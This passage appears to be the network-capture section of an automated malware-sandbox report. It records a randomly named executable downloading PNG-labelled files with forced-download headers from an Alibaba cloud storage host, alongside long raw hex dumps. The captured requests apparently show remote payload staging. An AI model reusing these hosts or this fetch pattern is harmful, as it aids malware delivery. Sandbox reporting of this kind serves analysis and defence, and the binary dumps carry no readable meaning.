                                                                        Data Ascii: K9L+/{m:#[.`Q-A*5{GyEQ6c;cW?j&"}+&Yd,B3qS4u:x6$+-k<aC9l*a?g{e/'{?x~\ks{n]^2Hdu!i{676;j0.`77
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: eb 57 4f 63 5c cc 42 b4 4e bf a4 71 d9 c4 a8 49 0d 65 77 c9 28 ce dd 85 44 1d 86 43 86 9e 4c 31 21 d2 41 d6 fc f3 bc de 57 be bc 58 e3 8b fb 22 7b 1a 86 e3 b5 90 bd 7c ed 96 57 e0 ef 7c 8a 8d ba c2 78 12 a7 94 e4 bb 49 0f b8 5b 33 f1 9d 3e 3e 83 13 44 16 e4 19 28 30 da 19 f4 58 77 59 d1 c1 4f ac 78 89 0c ca e9 a6 41 52 57 95 42 28 4a 8f 9c b0 51 65 15 a1 0b 92 e0 b9 9b c0 98 83 0c df 14 3d 3c 13 cb f3 40 83 0a 1a 8c cc 39 8a 9e 7b 65 89 31 42 8b 8d ce 8d da c5 33 dc 6c c6 8d 33 83 bd 72 3f 33 af fd 57 98 2e 30 19 14 39 28 7f 84 26 6c bf ae 57 b7 0c 5b c0 26 4b ea c3 f3 48 0f c1 aa ad 31 a9 35 a4 56 90 3f 12 a1 4f fb 4d 96 19 ac 80 6a 02 10 f9 4f ce 02 88 a7 d2 90 84 bc 5d a2 a2 87 83 c7 f6 44 93 95 40 5d f0 9e 39 68 f6 e6 27 9a 0b a9 af c3 6b 96 a1 5e f3
                                                                        Data Ascii: WOc\BNqIew(DCL1!AWX"{|W|xI[3>>D(0XwYOxARWB(JQe=<@9{e1B3l3r?3W.09(&lW[&KH15V?OMjO]D@]9h'k^
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: 1f 44 91 aa 8b bc 05 55 03 25 ad 18 97 34 b5 aa 8c f0 cc 5f 25 fe 7e 0c fd 4f 29 cb e1 a4 e0 20 0e bd 45 81 36 48 0a 71 60 3a f7 aa 87 1e b3 10 6a 07 b4 1d b1 96 74 37 22 11 0b 26 30 21 26 28 17 b6 eb fc 4c b5 b9 fb cb 96 eb f6 04 cd b8 89 74 bf 62 27 3c fa bc 45 d9 51 dd 8d eb a9 ec e5 6b d6 37 ac 4f c4 c1 47 dc e7 c6 ae 66 85 fd 6e 33 47 7e 0f a6 7e 01 e6 49 9e 0d 8e dd 9a 54 76 84 76 79 5e 0c ad 05 3c ce ea 42 ad b9 c5 50 dc 57 7b 35 83 ed 43 da 47 25 39 b8 55 1c 22 16 a3 3b bb 96 82 d0 3d 54 92 ee ce 23 db 18 6d 95 4b 32 2b 1c 6d 59 76 92 27 38 71 fb e0 b2 c3 ad 33 e4 dc e2 20 9f 4e 1d 8e eb 83 55 33 7e 82 7b 93 4e 81 47 e5 fe ec f6 06 42 20 0e 84 2f 83 23 59 3c 93 27 0b 7d 1c 35 cf ac aa eb 3c f4 69 3c e4 66 73 f1 97 fc c6 dd 8b 59 7a 05 bd d5 cf a8
                                                                        Data Ascii: DU%4_%~O) E6Hq`:jt7"&0!&(Ltb'<EQk7OGfn3G~~ITvvy^<BPW{5CG%9U";=T#mK2+mYv'8q3 NU3~{NGB /#Y<'}5<i<fsYz
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: 92 b2 7c a6 cd 52 9d c4 97 c0 9e db 30 fb 5d a4 ad e8 a8 48 54 db c4 c1 2d 82 be f2 dc 34 c2 e0 cb c3 58 b2 ac 29 24 07 fa a6 d1 ea 1c 4c b8 cd aa 25 f8 5c 42 98 62 f2 68 ad 31 53 06 04 07 4d 6d 99 2f 1d 4e a4 e7 66 2a 65 fc 2b 8b e7 03 54 9c 74 34 bf 2b 4a ad f7 89 96 c1 21 6e 0c e5 8f 2e 55 92 dc a8 c9 6c 5f f9 cf 47 ac 2a 10 a4 fd 23 20 cd f4 0b d8 c2 64 65 7e d1 aa f0 2e c0 56 18 20 d3 64 35 42 41 0e cd b5 e6 ff 77 24 d1 22 03 fc 08 aa 26 41 31 02 36 c2 c6 9a e9 45 58 bd 2b e1 a7 1b 8e 70 44 7e ca 89 33 94 c7 b8 d3 3a e6 87 e2 2e 1d 32 fe 30 c3 a2 2e 39 fc 89 40 45 9a 99 55 3b 30 99 0f d2 b0 17 60 3a 1f e4 d9 79 05 f8 25 f5 fd c4 9a 07 f5 84 30 c2 ab ba 97 95 5f 75 c0 20 12 da 75 e7 ca c7 43 5e c7 6a 4d c7 60 89 11 d3 04 2b 8b da 31 20 6b d0 32 40 61
                                                                        Data Ascii: |R0]HT-4X)$L%\Bbh1SMm/Nf*e+Tt4+J!n.Ul_G*# de~.V d5BAw$"&A16EX+pD~3:.20.9@EU;0`:y%0_u uC^jM`+1 k2@a
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: c1 4d 2c 3d ba 62 d6 96 71 ca d6 4b b5 58 cd 4a a4 11 4c a3 d0 89 6c 6b fc ee fc 4b 4d 35 c9 f7 95 4b 97 32 7e 44 2b 37 11 03 9b 99 91 5a f7 14 37 7b 37 cc 65 b7 a9 cf 8d f4 eb 41 46 51 24 fd 25 af fc 86 9c 1f c4 1a 54 8b 3b fb 7d 39 ec 48 e5 7f 21 a6 b6 db 76 55 bb 27 ea bc ab 6d 7a 28 4e ff 3f 9c a2 57 83 f5 fd 76 19 12 05 9b f5 d8 a8 07 9e 81 f9 12 bb 26 4a 6b ed d6 ac b7 f9 f9 e4 d0 bf 0b 9a 3f 49 46 40 63 f3 00 f8 8d e9 26 e6 fd 66 ea 99 8d bf e6 ed 98 de 15 fc 0a fa 0b ba 75 2e 1f a1 7f 27 dc bd a7 76 d8 98 91 91 79 63 58 d1 8a f8 f9 31 88 66 9b 7d 56 b3 ba 0e b5 ec 4a 54 b6 1e ff 15 5d 67 86 04 28 61 c5 76 22 30 7b 50 f4 8a 66 f7 1c 9a 39 a1 f9 22 90 d9 41 48 93 50 e7 2a 69 dc a7 cf e6 d3 6e 03 c6 19 7a c8 94 1a 5f 0e 7e ab c3 e2 8d 2e f0 f1 71 ae
                                                                        Data Ascii: M,=bqKXJLlkKM5K2~D+7Z7{7eAFQ$%T;}9H!vU'mz(N?Wv&Jk?IF@c&fu.'vycX1f}VJT]g(av"0{Pf9"AHP*inz_~.q
                                                                        2025-01-14 04:18:08 UTC4096INData Raw: 30 dc a8 86 8a 8d 57 75 88 45 99 d1 d6 cd 5e 4f 69 9a 0c 36 e9 b7 8c 7b 13 db f4 19 d3 01 f2 a0 48 d8 4a 89 2f 3d a8 74 d7 e8 bc 4e 70 18 9d 28 6f 98 b4 c2 9a 58 6d df dd 5a d6 24 eb bc eb 24 be b7 e7 d2 02 13 9f f6 92 b6 01 be 9c fc 5c fc bb e9 61 c9 a8 ce a6 f9 f3 10 cb 92 1b 91 59 ca 67 33 c9 33 97 8e ef 02 17 58 4b 63 e1 25 4d 3e e6 ca 69 0e f6 16 c5 bd d6 00 23 58 d8 ac a5 f3 37 34 59 c0 26 a9 c8 ca 47 33 aa 21 12 8e a1 b1 b4 45 97 58 5e 6f 86 95 92 32 de 10 ca 80 4e f0 3d 38 e8 2d 31 d9 4c 0d b0 ea 9d fa 03 af da e5 ce 06 fc 7f 93 1d e9 86 84 10 f1 fb ce 8e fc 26 c1 f6 91 f9 f1 c1 d7 80 5e 3b af 0c f1 52 ec 21 96 8e 81 7e ac 0d f8 ec cb 67 6c 10 b0 83 83 0a 12 b5 22 d5 b5 b0 18 73 d5 76 a3 88 37 35 b4 11 43 0b 74 ea 9e 40 2e 90 e2 29 c1 e9 02 56 dc
                                                                        Data Ascii: 0WuE^Oi6{HJ/=tNp(oXmZ$$\aYg33XKc%M>i#X74Y&G3!EX^o2N=8-1L&^;R!~gl"sv75Ct@.)V


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.11.2049774118.178.60.1034432236C:\Program Files (x86)\DXESuT\DXESuT.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:18:10 UTC127OUTGET /dsb-hr1.png HTTP/1.1
                                                                        User-Agent: Chrome/114.0.0.0
                                                                        Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:18:10 UTC546INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:18:10 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 486896
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E582E20C8C32330522FF
                                                                        Accept-Ranges: bytes
                                                                        ETag: "8FB4D4B3DCE57A2C6F9FF2278B5BAE86"
                                                                        Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 13263015917138006152
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: j7TUs9zleixvn/Ini1uuhg==
                                                                        x-oss-server-time: 9
                                                                        2025-01-14 04:18:10 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee 38 75 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb c7 70 77 57 fe fc f3 87 68 e8 e2 0b 6f cd 35 43 90 53 59 13 af fa 20 de 75 cf 38 f0 0a 60 ae 4e e6 3d 38 df 24 af 1e a0 e9 cb 6d 8f 0e 2b 74 0c e7 47 02 44 b6 86 1d e1 88 e3 39 f4 b1 3f 14
                                                                        Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*p8uXRL9uetxfA${4Fvjn;"_,Fy1pwWho5CSY u8`N=8$m+tGD9?
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: 12 b9 9e 1d 9a 7a 6b b1 80 2c d3 33 f3 ba d8 49 35 5f c0 e8 c1 62 ac 3f 5d 35 fd 81 a2 46 4a 0d 87 5a bb 96 93 58 b3 58 26 41 7a 31 5b cb b1 5d e2 77 41 fd a6 4d 43 ed 45 d8 5f 4d cd 42 68 56 f8 b9 06 ae ab e2 75 08 f0 40 35 77 d6 99 c2 30 b9 1e 71 e6 53 ee 08 06 50 41 34 32 04 72 01 92 fe c2 d7 d7 30 f9 aa 57 1d aa ca a8 5b 4b fb c9 1d 1f b6 e6 bf 24 74 6e b2 e3 12 73 ce 30 10 39 56 e8 ad 4c ee ad 21 38 ad 0a ff e2 98 23 e4 28 f7 11 5a b5 40 6e a0 0b 9a 1f a3 e6 44 ac 1e 57 02 b7 d7 40 1a 9b ec 2c 2b c7 65 e5 a6 b9 3e 4c b6 b6 cc 9d 74 d7 21 7e e5 30 aa b6 00 2f e5 49 66 71 f8 9f 70 c1 a0 f5 02 e2 56 d3 7c c3 29 7f 37 0c f8 84 e5 ae e4 d9 30 ca dd 0c 8e f2 de 9b 62 db c3 a1 20 e7 55 a9 fb ff a0 f8 5b de fe b4 8e d2 5c 24 e1 d0 cb 29 58 a5 cc f7 3a 36 4d
                                                                        Data Ascii: zk,3I5_b?]5FJZXX&Az1[]wAMCE_MBhVu@5w0qSPA42r0W[K$tns09VL!8#(Z@nDW@,+e>Lt!~0/IfqpV|)70b U[\$)X:6M
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: 67 41 fb 24 00 63 de bb bf 78 39 cb 89 d8 d1 c1 43 39 06 08 31 a5 c9 37 d5 60 29 c0 21 60 52 33 02 eb 3b 83 7c 9b db 93 c7 aa 75 44 f4 5d cb 29 c1 a2 ec ed a5 37 96 0c e7 d8 09 20 11 39 fa 3e 51 69 d9 d3 87 68 11 2e 42 a4 ee 48 18 b2 cc bd 88 e3 09 8a 0e 42 11 44 75 3b 07 48 f7 44 f4 65 d7 0c 99 ab 18 22 a6 af 3e d7 2e 78 c7 d4 fd 85 d4 b6 36 60 48 24 17 04 7d 04 30 ad d9 a2 22 d6 95 cd 12 79 1b 99 68 3d 05 9b 61 53 bd 57 16 9c 1b b4 2f a1 d2 2a 30 b8 66 e2 43 54 2e 50 45 54 2d b7 df 1c 72 6d 57 79 64 5a 8f 7c 2a 53 71 fa 52 54 f2 c0 5a c2 a9 03 c1 87 72 a8 19 59 74 20 19 ac 16 aa e9 0f 3a 4a 3b 06 d9 0d eb cb 6f 88 f9 76 06 58 61 96 6f 04 0c 5d e3 b1 68 78 0d a8 2e 24 5a 1e 5d b1 41 8f f1 d4 8c b5 ed ba a9 b7 e4 3a 80 80 75 04 7b 2f 4a fe c6 b4 90 f4 82
                                                                        Data Ascii: gA$cx9C917`)!`R3;|uD])7 9>Qih.BHBDu;HDe">.x6`H$}0"yh=aSW/*0fCT.PET-rmWydZ|*SqRTZrYt :J;ovXao]hx.$Z]A:u{/J
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: 0c 86 5e b7 a1 b6 ba 21 5f 01 98 e3 94 c6 39 26 87 95 b1 4a 82 31 c8 73 3e 23 d2 7c ff 19 9b 4e c9 aa ce c2 ad 50 48 7a 9f c2 20 d3 97 11 65 74 6f 4f fe 82 4e 60 e4 bb 87 bf 85 b5 5d 76 1a c8 08 64 75 59 71 2f 7d ce ae 7c 8c 63 2f dc f5 c7 25 9b b9 3a 62 4f 56 eb 6b 74 e9 c8 e3 16 75 63 34 fc 42 43 be e4 b7 28 07 6a 98 d1 f9 a2 84 fa 41 8f 82 20 18 60 da 35 92 4c 09 89 bf aa e3 d2 c3 b3 a3 95 ae 6f 10 ec bb d8 b9 49 21 cb bb dc 8a e3 25 4b 61 df d2 96 74 32 fa 6d 22 b2 b3 72 9f 07 34 f3 b9 ad dd ea e6 5b c8 a1 85 8e 81 d1 6c 06 ac d5 ce 45 b6 c9 34 6b 85 f4 79 ef 3a b9 c7 f6 38 14 a0 ee f6 06 72 2c 1a 3f d4 58 9e 7c 3d 75 17 e0 1f 57 36 32 d4 41 63 02 a4 cb 2d 01 a8 21 0d 73 0e bf 38 55 62 66 6b 65 55 c4 4a bc 85 ce f8 30 6e 7b 69 35 1d 34 a2 34 80 a8 79
                                                                        Data Ascii: ^!_9&J1s>#|NPHz etoON`]vduYq/}|c/%:bOVktuc4BC(jA `5LoI!%Kat2m"r4[lE4ky:8r,?X|=uW62Ac-!s8UbfkeUJ0n{i544y
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: b3 17 c8 fb d9 ba 4a 52 9e 19 b6 f2 0c 90 58 f1 c8 82 42 70 91 be fa f9 1e 87 5c 32 5c d9 be eb 70 9d dd 9a a0 fe ba 58 2b 40 8b 87 2f d8 1f 1f 28 3d 5e ce 63 c4 99 3e f8 e3 ad bc 24 77 b7 f7 48 3b 25 73 ae 0f 24 0b ec a3 75 ef ee 53 62 50 5d df 8c b2 3c 14 e6 c8 14 a7 cf c5 e9 4a db 4d d8 2e d8 26 7e 7f 62 aa 90 f6 73 09 0b 2b 06 cd dc ed a9 73 da 0f 11 49 ee 05 1b fb 5f ed 81 8b 07 7a a4 c1 96 fd ee aa 2c b9 6b f2 7e 05 90 09 d1 88 e1 03 55 dd 4c 27 e4 66 e2 c7 9e 4c 95 b9 2e 27 61 ea b1 1b 73 e9 b8 7f 48 f0 ef 88 75 c0 88 d3 ac 39 18 3a 88 23 ea 9b 8c bf f6 15 a3 0c 02 7d b8 b9 d2 bf f7 bb 9d f7 3a 5e ad c8 7f df 59 59 50 45 35 58 55 1a 34 e2 e4 c9 ce 79 ca aa d9 a2 c8 60 37 b5 a1 95 e9 0e ed cf 54 90 0d 93 62 94 c9 9c 68 c6 a4 6e d2 84 c9 ce 27 c8 d1
                                                                        Data Ascii: JRXBp\2\pX+@/(=^c>$wH;%s$uSbP]<JM.&~bs+sI_z,k~UL'fL.'asHu9:#}:^YYPE5XU4y`7Tbhn'
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: f9 fe d5 7c f4 d3 f1 f3 0a 69 56 c3 f3 77 ac 5b 22 06 46 d8 2a 8b 44 de df 0c bd f8 67 3d ce c6 b2 ba 98 93 9c 1b e3 a6 69 8a f4 10 3c f2 05 cc 33 b0 82 5e b5 e8 9d 69 38 9c 6d 7c 5d 5c e0 d7 6c b5 18 cc 07 12 fb 6d ad 33 b7 ce 56 6e fb 27 9b 4d 3b 1d 1b a6 0b 40 31 dd 1a 92 14 ae 0d 0e 8a 3d db 9e bd ed 8e 11 42 5d cc 85 c4 54 1c 95 f9 57 95 67 32 a1 25 17 66 cf 4b 55 4f 97 79 32 14 bb 22 89 9b 26 fd 5c 2d 05 9d 33 63 4b ad 61 8c 1b 00 4a ab 92 f9 63 37 47 2c 9e e1 0a 8d 10 9b 75 58 81 25 cc 71 4d 08 5a da da ea 7c 1a 00 d0 4e e7 85 84 8b 5d 48 5a 0a ca b9 30 06 19 e4 22 2e 6b 04 99 ce cb f7 89 cb f6 13 c1 94 b5 05 4a 85 c0 9b d3 21 7e 4f ea fa 6a ae d0 4c c1 8c 86 6c a0 98 cd b2 42 88 96 d4 a0 1e 7c 01 66 f1 e7 5c d8 13 28 d0 6f ae 96 fa 4c b4 3f 75 a7
                                                                        Data Ascii: |iVw["F*Dg=i<3^i8m|]\lm3Vn'M;@1=B]TWg2%fKUOy2"&\-3cKaJc7G,uX%qMZ|N]HZ0".kJ!~OjLlB|f\(oL?u
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: dc c5 62 f2 8c aa 9a 4f ce 3e 97 37 8a ad 9f 49 02 38 d0 3a 49 72 ce 5d e2 69 2a db 55 1b f0 0b c5 ef 3a dc bf 14 5a 9e a7 ca 27 77 3c 23 8e 6e bb 98 c1 da 01 97 f6 74 b5 4f f1 3a 81 f2 e6 a5 9d c6 76 c3 97 80 be 85 db 96 86 0c 7c 6c 07 e1 1a ed 98 2f bd b6 29 a0 f2 ff 4a c3 da 8f 55 54 b7 4b 51 17 7f 33 56 a8 df 0d ee 04 6a b3 2b 29 f0 93 a2 30 5c 2e 53 cc 6b 67 65 bc 9c 12 44 ae 75 e7 80 fe 45 b0 87 7b e5 16 f5 25 aa d4 ba 9f 18 aa 91 cd 57 93 11 ab 3d 75 22 fd c8 08 af 2e b7 fe 7e 7d d6 be 04 c4 cd d5 bd 37 9d 92 f0 bb a7 1f 9a 07 20 ee 36 3e 5c 26 03 e7 b8 03 fa 48 8f 61 16 08 a4 c7 6e 63 37 04 25 80 a8 52 06 b7 bb 1a d9 c2 f4 03 f4 b3 f7 f4 b7 2c 3e 22 6d 3b 5a 26 34 93 6a 6a 8c 33 8e f8 a5 7f 40 d9 25 aa aa 93 35 2f d0 c3 53 48 30 0e 58 fe c7 84 73
                                                                        Data Ascii: bO>7I8:Ir]i*U:Z'w<#ntO:v|l/)JUTKQ3Vj+)0\.SkgeDuE{%W=u".~}7 6>\&Hanc7%R,>"m;Z&4jj3@%5/SH0Xs
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: c0 70 9d c1 0b f2 f3 a3 ba 3e 88 f1 4d 79 2f 5c c2 1b 26 87 6b 27 35 06 0f b1 e3 60 65 26 77 4d 82 24 e7 b4 0e 9e 25 6c 3d a5 29 a6 61 a7 ad 33 62 d3 73 41 dd 47 1d fb d6 16 b5 2f 32 38 72 12 82 aa 75 51 f2 48 82 31 65 f5 7f 7f 01 b0 2b 42 11 c2 d5 8d 71 89 5b b5 12 ea 71 33 8c d4 a5 36 69 b0 e4 86 2d 07 1e 9b c1 06 80 e9 05 b2 5a 9b e9 46 d8 dd ca f7 c2 7c 3c 7b dd 42 c5 2f 8b f2 7c 5b a1 7a 9d d6 6e c7 12 18 98 fd 68 32 99 c9 55 2a 32 1a 6b 8b e3 e1 33 ef 6f 1c 29 e4 a0 6b 18 39 6a e8 35 9f 8a ac ea 9b 6b 01 5d 4f df fa 7a 3c 39 ae bf 1d 70 b1 c0 f6 8f 62 6d 1a 35 41 7e 96 e0 ea bf 46 72 c7 67 42 99 78 0d 52 50 22 50 d0 23 de 89 41 26 f5 42 f2 74 f8 3d 24 c5 6f d2 33 c1 92 9d a3 bb 99 72 8f 27 63 90 9d ec 7f da 8e 79 18 f2 50 f3 52 b2 42 f4 e0 d0 49 61
                                                                        Data Ascii: p>My/\&k'5`e&wM$%l=)a3bsAG/28ruQH1e+Bq[q36i-ZF|<{B/|[znh2U*2k3o)k9j5k]Oz<9pbm5A~FrgBxRP"P#A&Bt=$o3r'cyPRBIa
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: 69 26 08 4c 56 a1 2a 49 a9 0b 80 33 53 6f 04 93 b2 75 9d 8a 06 a6 31 4e 22 6a 16 5d 00 d5 36 f8 ac 33 53 50 19 c2 95 81 37 b4 47 a5 a7 f2 ee 2b 1b ca db 4d 59 b8 7c dc 3a 67 c2 63 95 a0 57 01 d3 6a 05 01 15 1f 7f df aa 51 23 11 80 33 00 e5 5d e6 19 c2 8c b6 6b b7 f7 df 59 f2 8c f9 41 24 69 2f ff b3 fd 50 e5 36 d0 ce a7 e2 7d 58 2d 20 b7 a7 9f 9b 94 cd 0e c2 e5 39 ed bc d2 19 1d 15 59 ea 59 42 1a 68 14 50 7d cf 60 91 a9 0d 47 a6 f4 3c 4d 55 f3 2a 7f a8 4f 4e 88 e1 77 cf da 0b c5 73 ae b9 8d f0 45 74 07 59 83 6b 86 5f 9f 3a 76 ec 19 7c 5a 34 cd ae 78 d5 9d fc a6 3b b4 13 5b 1d 84 b2 66 50 02 26 ee dd 1a 42 91 e1 87 36 5d a7 54 a2 39 1b 3d ec ac 80 5a 1c dc 54 aa 13 6f 42 fc 33 94 74 ae 9f 8f 8e 27 68 f9 4c c8 19 d1 54 f2 15 1e 82 8a c7 2f e6 1d 6d 97 22 f8
                                                                        Data Ascii: i&LV*I3Sou1N"j]63SP7G+MY|:gcWjQ#3]kYA$i/P6}X- 9YYBhP}`G<MU*ONwsEtYk_:v|Z4x;[fP&B6]T9=ZToB3t'hLT/m"
                                                                        2025-01-14 04:18:10 UTC4096INData Raw: 21 50 b7 0e f4 7b 90 de e6 eb d2 21 e8 ae ef b4 0a d8 71 9e 2a 44 fe 1f 3e 71 4d 39 6b 07 91 2d 30 2d 48 27 b6 31 53 5f 58 c2 6e 93 cb ac 81 11 b1 be e8 83 eb 7a 5f 6a 4b 95 34 3d 79 ea 11 c8 89 e1 35 52 73 85 00 70 cb 4c 78 e6 0c 48 26 e0 86 3e 38 0b c6 59 3b e8 61 b7 3b 0c 8b 5c 2d 01 24 8d 26 28 5f 95 d3 91 74 82 da d6 de 87 c2 7e 17 54 71 bc 82 6d d4 28 9a 27 fc 0c bf a8 19 d3 1a 05 a9 3b dc e8 68 c8 b5 38 e1 b9 1a 8d 6d 38 cd 1d 16 d6 b9 89 f0 7b 53 bb 0c 90 b6 f5 a1 14 2b 45 e3 ed 43 8e 61 51 1e 84 55 27 0d 0d e7 26 59 01 77 2c b7 63 00 f7 1c 42 4c 15 44 79 4a c9 94 ea 4a 4e 13 df 27 43 80 e6 8e 4f 91 f9 48 ec 77 81 e0 f8 15 b3 10 31 14 da 87 fb 99 6b 6d c9 7e d6 89 d7 99 79 b5 ec d6 15 76 df 19 04 80 61 c3 54 5d 80 0e 5d ed 9a a7 39 83 ae 15 43 87
                                                                        Data Ascii: !P{!q*D>qM9k-0-H'1S_Xnz_jK4=y5RspLxH&>8Y;a;\-$&(_t~Tqm(';h8m8{S+ECaQU'&Yw,cBLDyJJN'COHw1km~yvaT]]9C


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        17192.168.11.2049775118.178.60.103443
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-14 04:18:14 UTC128OUTGET /page-404.png HTTP/1.1
                                                                        User-Agent: Chrome/114.0.0.0
                                                                        Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                        Cache-Control: no-cache
                                                                        2025-01-14 04:18:14 UTC545INHTTP/1.1 200 OK
                                                                        Server: AliyunOSS
                                                                        Date: Tue, 14 Jan 2025 04:18:14 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 670784
                                                                        Connection: close
                                                                        x-oss-request-id: 6785E586716A9C3130494A04
                                                                        Accept-Ranges: bytes
                                                                        ETag: "06C2604A6B2E157543D6812D4F88D743"
                                                                        Last-Modified: Sat, 13 Jul 2024 15:18:20 GMT
                                                                        x-oss-object-type: Normal
                                                                        x-oss-hash-crc64ecma: 8552415919623655984
                                                                        x-oss-storage-class: Standard
                                                                        x-oss-ec: 0048-00000105
                                                                        Content-Disposition: attachment
                                                                        x-oss-force-download: true
                                                                        Content-MD5: BsJgSmsuFXVD1oEtT4jXQw==
                                                                        x-oss-server-time: 2
                                                                        2025-01-14 04:18:14 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee 18 75 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb c7 f5 f7 15 fe 79 73 c5 68 6d 62 49 6f 48 b5 01 d2 a2 c9 50 85 7f a0 9c e2 3d b3 b3 e0 e5 2e 0c d4 f4 75 9d 3a 2a 9e e2 44 1b e3 cc 11 ae f4 4e b5 b7 80 07 e1 01 9d a3 b8 0c af b7 f5 ba 94
                                                                        Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*puXRL9uetxfA${4Fvjn;"_,Fy1yshmbIoHP=.u:*DN
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: f6 ea 55 f5 0b ff 3a 43 4b ef 67 d3 aa bb 38 d2 8e 3f 16 04 ca 0f 54 3b 54 ea d8 36 28 86 5a e4 79 ec df 14 4e 66 83 5c e6 bd f2 87 23 2f 5b 24 ba b5 55 8b 19 71 6f ed 25 99 15 6c 7f 5d ae eb 62 f4 2a 59 0d 0b dc 8a bb 66 4b f4 60 82 71 99 3d 5a c8 07 bf ee 40 f4 3f d4 4f 43 81 ad 5a c1 64 fd 8a db 91 f8 26 e1 fd 79 87 cd 04 71 0a 00 87 41 7f c0 12 9c 8b 2a 2d 7a 16 ca f9 78 39 33 f6 f6 d4 25 53 c0 f1 f2 ba 53 c1 5e ae 72 60 4c 4d cc 83 96 ef 1f 88 fa ec 45 f3 42 bc 73 ca 19 cb 2b 1e b4 d0 a6 69 b5 77 90 67 5b ec f7 65 e6 84 10 6e aa 5c 5a 31 ca af 39 b2 44 6c 0f 9f 90 0c 8b 78 20 22 e5 51 70 57 f9 50 40 fc 5e 86 1c 29 27 48 eb 19 d4 32 e9 f0 fb 40 6c 88 b9 b5 86 a6 d1 53 b3 c4 a1 31 ac 2c 39 9c 9d 6c 6f 7b b9 ab b0 59 dc 80 01 a3 ed da 83 c2 f7 b1 55 ef
                                                                        Data Ascii: U:CKg8?T;T6(ZyNf\#/[$Uqo%l]b*YfK`q=Z@?OCZd&yqA*-zx93%SS^r`LMEBs+iwg[en\Z19Dlx "QpWP@^)'H2@lS1,9lo{YU
                                                                        2025-01-14 04:18:14 UTC4096INData Raw: 8f 04 05 04 be cb 0a e8 3d 39 72 99 e2 0b e3 c7 aa f1 bc fd f2 37 55 a4 5d 79 39 77 4c 84 95 fa be ca 70 33 b0 fe 32 62 ec 22 d3 3d 6e 6f 29 8a b6 e0 9f ec 51 eb 9a 54 03 6f eb c2 a8 40 06 f2 d7 50 3b fa 72 d5 17 23 d2 b1 93 04 dc 7e 04 41 88 18 15 ff 94 01 51 51 4a 0d 03 fb f6 d6 62 ea 6f a3 34 9e d3 a2 91 a5 c0 cd 7a de 06 73 e8 65 d4 8e 05 86 b6 7f fc 86 04 f0 6f b1 5a f7 cf 54 ba 92 7a c6 bf 6c 27 2f e7 fb 2d 9f a6 4d d5 b0 70 95 c5 67 9f b6 00 ba a4 36 62 02 e5 5b cf 61 9c 09 11 ed fa f5 16 d3 c6 c6 49 2f 96 b5 95 b6 5f 74 87 22 34 11 cf f6 e0 2b 59 b1 23 f8 8b bb 0e 1c 3a 25 31 3f 09 56 17 94 a3 f2 4f 91 e2 f4 ba 79 31 bb 88 4b 33 21 00 c6 87 a4 65 69 61 65 55 e0 4a ca 90 3a 8d 35 29 18 33 ad 87 07 f1 62 7f d8 c3 62 03 1a a7 45 47 54 e0 6e ea a1 90
